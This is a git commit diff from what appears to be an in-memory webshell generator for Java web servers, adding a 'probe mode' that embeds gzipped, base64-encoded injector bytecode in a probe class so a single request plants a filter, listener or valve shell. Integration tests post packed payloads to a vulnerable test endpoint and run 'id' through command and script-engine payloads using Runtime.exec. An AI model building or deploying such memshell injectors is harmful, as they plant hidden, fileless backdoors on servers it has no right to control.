feat: support probe mode

Author: ReaJason

generator/src/main/java/com/reajason/javaweb/memshell/MemShellGenerator.java

@@ -6,7 +6,13 @@
 import com.reajason.javaweb.memshell.config.ShellToolConfig;
 import com.reajason.javaweb.memshell.generator.InjectorGenerator;
 import com.reajason.javaweb.memshell.server.AbstractServer;
+import com.reajason.javaweb.probe.ProbeContent;
+import com.reajason.javaweb.probe.ProbeMethod;
+import com.reajason.javaweb.probe.config.ProbeConfig;
+import com.reajason.javaweb.probe.config.ResponseBodyConfig;
+import com.reajason.javaweb.probe.generator.response.ResponseBodyGenerator;
 import com.reajason.javaweb.utils.CommonUtil;
+import org.apache.commons.codec.binary.Base64;
 import org.apache.commons.lang3.StringUtils;
 import org.apache.commons.lang3.tuple.Pair;
 
@@ -59,6 +65,25 @@ public static MemShellResult generate(ShellConfig shellConfig, InjectorConfig in
 
         InjectorGenerator injectorGenerator = new InjectorGenerator(shellConfig, injectorConfig);
         byte[] injectorBytes = injectorGenerator.generate();
+        if (shellConfig.isProbe() && !shellConfig.getShellType().startsWith(ShellType.AGENT)) {
+            ProbeConfig probeConfig = ProbeConfig.builder()
+                    .shellClassName(injectorConfig.getInjectorClassName() + "1")
+                    .probeMethod(ProbeMethod.ResponseBody)
+                    .probeContent(ProbeContent.Bytecode)
+                    .targetJreVersion(shellConfig.getTargetJreVersion())
+                    .byPassJavaModule(shellConfig.isByPassJavaModule())
+                    .shrink(shellConfig.isShrink())
+                    .debug(shellConfig.isDebug())
+                    .staticInitialize(injectorConfig.isStaticInitialize())
+                    .build();
+            ResponseBodyConfig responseBodyConfig = ResponseBodyConfig.builder()
+                    .server(serverName)
+                    .base64Bytes(Base64.encodeBase64String(CommonUtil.gzipCompress(injectorBytes)))
+                    .build();
+            injectorBytes = new ResponseBodyGenerator(probeConfig, responseBodyConfig).getBytes();
+            injectorConfig.setInjectorClassName(probeConfig.getShellClassName());
+        }
+
         Map<String, byte[]> innerClassBytes = injectorGenerator.getInnerClassBytes();
 
         return MemShellResult.builder()

generator/src/main/java/com/reajason/javaweb/memshell/config/ShellConfig.java

@@ -55,6 +55,12 @@ public class ShellConfig {
     @Builder.Default
     private boolean debug = false;
 
+    /**
+     * 是否使用回显模式
+     */
+    @Builder.Default
+    private boolean probe = false;
+
     /**
      * 是否启用缩小字节码
      */
@@ -71,7 +77,6 @@ public boolean isDebugOff() {
         return !debug;
     }
 
-
     public boolean isJakarta() {
         return shellType.startsWith(ShellType.JAKARTA);
     }

generator/src/main/java/com/reajason/javaweb/memshell/server/AbstractServer.java

@@ -1,5 +1,6 @@
 package com.reajason.javaweb.memshell.server;
 
+import org.apache.commons.lang3.StringUtils;
 import org.apache.commons.lang3.tuple.Pair;
 
 import java.util.Collections;
@@ -49,6 +50,9 @@ public Set<String> getSupportedShellTools() {
     }
 
     public Pair<Class<?>, Class<?>> getShellInjectorPair(String shellTool, String shellType) {
+        if (StringUtils.isBlank(shellTool)) {
+            throw new IllegalArgumentException("shellTool is required");
+        }
         ToolMapping mapping = map.get(shellTool);
         if (mapping == null) {
             throw new UnsupportedOperationException("please implement shell type: " + shellType + " for " + shellTool);

generator/src/main/java/com/reajason/javaweb/probe/config/ResponseBodyConfig.java

@@ -13,5 +13,14 @@
 @ToString
 public class ResponseBodyConfig extends ProbeContentConfig {
     private String server;
+
+    /**
+     * 获取参数的请求头或请求参数名称
+     */
     private String reqParamName;
+
+    /**
+     * 内置执行类加载的字节码
+     */
+    private String base64Bytes;
 }

generator/src/main/java/com/reajason/javaweb/probe/generator/response/ResponseBodyGenerator.java

@@ -36,14 +36,19 @@ protected DynamicType.Builder<?> build(ByteBuddy buddy) {
         Class<?> getDataFromReqInterceptor = getDataFromReqInterceptor.class;
         Class<?> writerClass = getWriterClass();
         Class<?> runnerClass = getRunnerClass();
-        return buddy.redefine(writerClass)
+        DynamicType.Builder<?> builder = buddy.redefine(writerClass)
                 .name(probeConfig.getShellClassName())
                 .visit(new TargetJreVersionVisitorWrapper(probeConfig.getTargetJreVersion()))
-                .visit(MethodCallReplaceVisitorWrapper.newInstance("getDataFromReq",
-                        probeConfig.getShellClassName(), ShellCommonUtil.class.getName()))
-                .visit(Advice.withCustomMapping().bind(NameAnnotation.class, name)
-                        .to(getDataFromReqInterceptor).on(named("getDataFromReq")))
                 .visit(Advice.to(runnerClass).on(named("run")));
+        if (StringUtils.isNotBlank(probeContentConfig.getReqParamName())) {
+            builder = builder.visit(MethodCallReplaceVisitorWrapper.newInstance("getDataFromReq",
+                            probeConfig.getShellClassName(), ShellCommonUtil.class.getName()))
+                    .visit(Advice.withCustomMapping().bind(NameAnnotation.class, name)
+                            .to(getDataFromReqInterceptor).on(named("getDataFromReq")));
+        } else if (ProbeContent.Bytecode.equals(probeConfig.getProbeContent())) {
+            builder = builder.method(named("getDataFromReq")).intercept(FixedValue.value(probeContentConfig.getBase64Bytes()));
+        }
+        return builder;
     }
 
     private Class<?> getRunnerClass() {

generator/src/main/java/com/reajason/javaweb/utils/CommonUtil.java

@@ -1,8 +1,9 @@
 package com.reajason.javaweb.utils;
 
+import lombok.SneakyThrows;
+
 import java.io.ByteArrayInputStream;
 import java.io.ByteArrayOutputStream;
-import java.io.IOException;
 import java.security.SecureRandom;
 import java.util.Arrays;
 import java.util.HashSet;
@@ -45,15 +46,17 @@ public class CommonUtil {
             "Checker"
     };
 
-    public static byte[] gzipCompress(byte[] data) throws IOException {
+    @SneakyThrows
+    public static byte[] gzipCompress(byte[] data) {
         ByteArrayOutputStream out = new ByteArrayOutputStream();
         try (GZIPOutputStream gzip = new GZIPOutputStream(out)) {
             gzip.write(data);
         }
         return out.toByteArray();
     }
 
-    public static byte[] gzipDecompress(byte[] data) throws IOException {
+    @SneakyThrows
+    public static byte[] gzipDecompress(byte[] data) {
         ByteArrayOutputStream out = new ByteArrayOutputStream();
         try (GZIPInputStream gzip = new GZIPInputStream(new ByteArrayInputStream(data))) {
             byte[] buffer = new byte[1024];

integration-test/src/test/java/com/reajason/javaweb/integration/ProbeAssertion.java

@@ -1,6 +1,7 @@
 package com.reajason.javaweb.integration;
 
 import com.reajason.javaweb.integration.probe.DetectionTool;
+import com.reajason.javaweb.packer.Packers;
 import com.reajason.javaweb.probe.ProbeContent;
 import com.reajason.javaweb.probe.ProbeMethod;
 import com.reajason.javaweb.probe.ProbeShellGenerator;
@@ -38,12 +39,12 @@ public static void responseBytecodeIsOk(String url, String server, int targetJre
                 .build();
         ProbeShellResult probeResult = ProbeShellGenerator.generate(probeConfig, responseBodyConfig);
         RequestBody requestBody = new FormBody.Builder()
-                .add("data", probeResult.getShellBytesBase64Str())
+                .add("data", Packers.BigInteger.getInstance().pack(probeResult.toClassPackerConfig()))
                 .add(reqParamName, DetectionTool.getServerDetection())
                 .build();
         Request request = new Request.Builder()
                 .header("Content-Type", "application/x-www-form-urlencoded")
-                .url(url + "/b64").post(requestBody)
+                .url(url + "/biginteger").post(requestBody)
                 .build();
         try (Response response = new OkHttpClient().newCall(request).execute()) {
             assertEquals(server, response.body().string());
@@ -67,12 +68,12 @@ public static void responseBytecodeWithoutPrefixIsOk(String url, String server,
                 .build();
         ProbeShellResult probeResult = ProbeShellGenerator.generate(probeConfig, responseBodyConfig);
         RequestBody requestBody = new FormBody.Builder()
-                .add("data", probeResult.getShellBytesBase64Str())
+                .add("data", Packers.BigInteger.getInstance().pack(probeResult.toClassPackerConfig()))
                 .add(reqParamName, DetectionTool.getServerDetection().replace("yv66vgAAAD", ""))
                 .build();
         Request request = new Request.Builder()
                 .header("Content-Type", "application/x-www-form-urlencoded")
-                .url(url + "/b64").post(requestBody)
+                .url(url + "/biginteger").post(requestBody)
                 .build();
         try (Response response = new OkHttpClient().newCall(request).execute()) {
             assertEquals(server, response.body().string());
@@ -95,14 +96,13 @@ public static void responseCommandIsOk(String url, String server, int targetJreV
                 .reqParamName(headerName)
                 .build();
         ProbeShellResult probeResult = ProbeShellGenerator.generate(probeConfig, responseBodyConfig);
-        String content = probeResult.getShellBytesBase64Str();
         RequestBody requestBody = new FormBody.Builder()
-                .add("data", content)
+                .add("data", Packers.BigInteger.getInstance().pack(probeResult.toClassPackerConfig()))
                 .build();
         Request request = new Request.Builder()
                 .header("Content-Type", "application/x-www-form-urlencoded")
                 .header(headerName, "id")
-                .url(url + "/b64").post(requestBody)
+                .url(url + "/biginteger").post(requestBody)
                 .build();
         try (Response response = new OkHttpClient().newCall(request).execute()) {
             assertThat(response.body().string(), anyOf(
@@ -127,14 +127,13 @@ public static void responseScriptEngineIsOk(String url, String server, int targe
                 .reqParamName(headerName)
                 .build();
         ProbeShellResult probeResult = ProbeShellGenerator.generate(probeConfig, responseBodyConfig);
-        String content = probeResult.getShellBytesBase64Str();
         RequestBody requestBody = new FormBody.Builder()
-                .add("data", content)
+                .add("data", Packers.BigInteger.getInstance().pack(probeResult.toClassPackerConfig()))
                 .build();
         Request request = new Request.Builder()
                 .header("Content-Type", "application/x-www-form-urlencoded")
                 .header(headerName, "new java.util.Scanner(java.lang.Runtime.getRuntime().exec('id').getInputStream()).useDelimiter('\\A').next()")
-                .url(url + "/b64").post(requestBody)
+                .url(url + "/biginteger").post(requestBody)
                 .build();
         try (Response response = new OkHttpClient().newCall(request).execute()) {
             assertThat(response.body().string(), anyOf(

integration-test/src/test/java/com/reajason/javaweb/integration/ShellAssertion.java

@@ -6,6 +6,7 @@
 import com.reajason.javaweb.godzilla.GodzillaManager;
 import com.reajason.javaweb.memshell.MemShellGenerator;
 import com.reajason.javaweb.memshell.MemShellResult;
+import com.reajason.javaweb.memshell.ShellTool;
 import com.reajason.javaweb.memshell.ShellType;
 import com.reajason.javaweb.memshell.config.*;
 import com.reajason.javaweb.packer.JarPacker;
@@ -27,6 +28,7 @@
 import org.apache.commons.lang3.RandomStringUtils;
 import org.apache.commons.lang3.StringUtils;
 import org.apache.commons.lang3.tuple.Pair;
+import org.hamcrest.Matchers;
 import org.testcontainers.containers.Container;
 import org.testcontainers.containers.GenericContainer;
 import org.testcontainers.utility.MountableFile;
@@ -185,11 +187,7 @@ public static void assertShellIsOk(MemShellResult generateResult, String shellUr
                 godzillaIsOk(shellUrl, ((GodzillaConfig) generateResult.getShellToolConfig()));
                 break;
             case Command:
-                if (shellType.endsWith(ShellType.WEBSOCKET)) {
-                    webSocketCommandIsOk(shellUrl, "id");
-                } else {
-                    commandIsOk(shellUrl, ((CommandConfig) generateResult.getShellToolConfig()), "id");
-                }
+                commandIsOk(shellUrl, shellType, ((CommandConfig) generateResult.getShellToolConfig()).getParamName(), "id");
                 break;
             case Behinder:
                 behinderIsOk(shellUrl, ((BehinderConfig) generateResult.getShellToolConfig()));
@@ -227,11 +225,15 @@ public static void godzillaIsOk(String entrypoint, GodzillaConfig shellConfig) {
     }
 
     @SneakyThrows
-    public static void commandIsOk(String entrypoint, CommandConfig shellConfig, String payload) {
+    public static void commandIsOk(String entrypoint, String shellType, String paramName, String payload) {
+        if (shellType.endsWith(ShellType.WEBSOCKET)) {
+            webSocketCommandIsOk(entrypoint, payload);
+            return;
+        }
         OkHttpClient okHttpClient = new OkHttpClient();
         HttpUrl url = Objects.requireNonNull(HttpUrl.parse(entrypoint))
                 .newBuilder()
-                .addQueryParameter(shellConfig.getParamName(), payload)
+                .addQueryParameter(paramName, payload)
                 .build();
         Request request = new Request.Builder()
                 .url(url)
@@ -403,4 +405,43 @@ public static void injectIsOk(String url, String shellType, String shellTool, St
             default -> throw new IllegalStateException("Unexpected value: " + packer);
         }
     }
+
+    public static void testProbeInject(String url, String server, String serverVersion, String shellType, int targetJdkVersion) {
+        String shellTool = ShellTool.Command;
+        Packers packer = Packers.BigInteger;
+        Pair<String, String> urls = ShellAssertion.getUrls(url, shellType, shellTool, packer);
+        String shellUrl = urls.getLeft();
+        String urlPattern = urls.getRight();
+        ShellConfig shellConfig = ShellConfig.builder()
+                .server(server)
+                .serverVersion(serverVersion)
+                .shellType(shellType)
+                .shellTool(shellTool)
+                .targetJreVersion(targetJdkVersion)
+                .debug(false)
+                .probe(true)
+                .build();
+        InjectorConfig injectorConfig = InjectorConfig.builder()
+                .urlPattern(urlPattern)
+                .staticInitialize(true)
+                .build();
+        String paramName = "tomcatProbe" + shellType;
+        CommandConfig commandConfig = CommandConfig.builder()
+                .paramName(paramName)
+                .build();
+        MemShellResult generateResult = MemShellGenerator.generate(shellConfig, injectorConfig, commandConfig);
+        String content = packer.getInstance().pack(generateResult.toClassPackerConfig());
+        String res = VulTool.postIsOk(url + "/biginteger", content);
+        assertThat(res, anyOf(
+                Matchers.containsString("context: "),
+                Matchers.containsString("server: "),
+                Matchers.containsString("channel: ")
+
+        ));
+        ShellAssertion.commandIsOk(shellUrl, shellType, paramName, "id");
+    }
+
+    public static void testProbeInject(String url, String server, String shellType, int targetJdkVersion) {
+        testProbeInject(url, server, null, shellType, targetJdkVersion);
+    }
 }

integration-test/src/test/java/com/reajason/javaweb/integration/VulTool.java

@@ -46,7 +46,7 @@ public static void uploadJspFileToServer(String uploadUrl, String filename, Stri
     }
 
     @SneakyThrows
-    public static void postIsOk(String uploadUrl, String data) {
+    public static String postIsOk(String uploadUrl, String data) {
         RequestBody requestBody = new FormBody.Builder()
                 .add("data", data)
                 .build();
@@ -56,8 +56,10 @@ public static void postIsOk(String uploadUrl, String data) {
                 .url(uploadUrl).post(requestBody)
                 .build();
         try (Response response = new OkHttpClient().newCall(request).execute()) {
-            System.out.println(response.body().string());
+            String res = response.body().string();
+            System.out.println(res);
             Assertions.assertNotEquals(404, response.code());
+            return res;
         }
     }
 

integration-test/src/test/java/com/reajason/javaweb/integration/memshell/glassfish/GlassFish3ContainerTest.java

@@ -1,6 +1,7 @@
 package com.reajason.javaweb.integration.memshell.glassfish;
 
 import com.reajason.javaweb.Server;
+import com.reajason.javaweb.integration.ShellAssertion;
 import com.reajason.javaweb.integration.TestCasesProvider;
 import com.reajason.javaweb.memshell.ShellType;
 import com.reajason.javaweb.packer.Packers;
@@ -11,6 +12,7 @@
 import org.junit.jupiter.params.ParameterizedTest;
 import org.junit.jupiter.params.provider.Arguments;
 import org.junit.jupiter.params.provider.MethodSource;
+import org.junit.jupiter.params.provider.ValueSource;
 import org.testcontainers.containers.GenericContainer;
 import org.testcontainers.containers.Network;
 import org.testcontainers.containers.wait.strategy.Wait;
@@ -80,4 +82,13 @@ static void tearDown() {
     void test(String imageName, String shellType, String shellTool, Packers packer) {
         shellInjectIsOk(getUrl(container), Server.GlassFish, shellType, shellTool, Opcodes.V1_6, packer, container, python);
     }
+
+    @ParameterizedTest
+    @ValueSource(strings = {ShellType.FILTER,
+            ShellType.LISTENER,
+            ShellType.VALVE,})
+    void testProbeInject(String shellType) {
+        String url = getUrl(container);
+        ShellAssertion.testProbeInject(url, Server.GlassFish, shellType, Opcodes.V1_6);
+    }
 }